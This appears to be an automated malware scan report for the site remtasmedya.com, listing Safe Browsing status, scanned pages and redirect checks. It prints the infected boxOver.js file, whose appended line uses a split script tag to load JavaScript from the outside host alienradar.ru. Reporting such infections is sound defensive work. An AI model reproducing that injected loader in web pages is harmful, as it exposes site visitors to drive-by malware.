Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=remtasmedya.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.remtasmedya.com/ | 200 OK Content-Length: 3076 Content-Type: text/html | clean |
http://www.remtasmedya.com/index.php | 200 OK Content-Length: 3076 Content-Type: text/html | clean |
http://www.remtasmedya.com/takip.php | 200 OK Content-Length: 3136 Content-Type: text/html | clean |
http://www.remtasmedya.com/js/boxOver.js | 200 OK Content-Length: 10973 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof document.attachEvent!='undefined') { window.attachEvent('onload',initboxOver); document.attachEvent('onmousemove',moveMouse); document.attachEvent('onclick',checkMove); } else { window.addEventListener('load',initboxOver,false); document.addEventListener('mousemove',moveMouse,false); document.addEventListener('click',checkMove,false); } var oDv=document.createElement("div"); var dvHdr=document.createElement("div"); var dvBd for (i=0;i< elements.length;i++){ elements[i].style.visibility='visible'; } } function hideSelects(){ var elements = document.getElementsByTagName("select"); for (i=0;i< elements.length;i++){ elements[i].style.visibility='hidden'; } } document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Mebibyte.js"></scri'+'pt>'); Antivirus reports:
| ||
http://www.remtasmedya.com/iletisim.php | 200 OK Content-Length: 4 Content-Type: text/html | clean |
http://www.remtasmedya.com/test404page.js | 404 Not Found Content-Length: 440 Content-Type: text/html | clean |
http://www.remtasmedya.com/yardim.php | 200 OK Content-Length: 4 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: remtasmedya.com
Result:
GET / HTTP/1.1
Host: remtasmedya.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: remtasmedya.com
Referer: http://www.google.com/search?q=remtasmedya.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: remtasmedya.com
Referer: http://www.google.com/search?q=remtasmedya.com
Result:
The result is similar to the first query. There are no suspicious redirects found.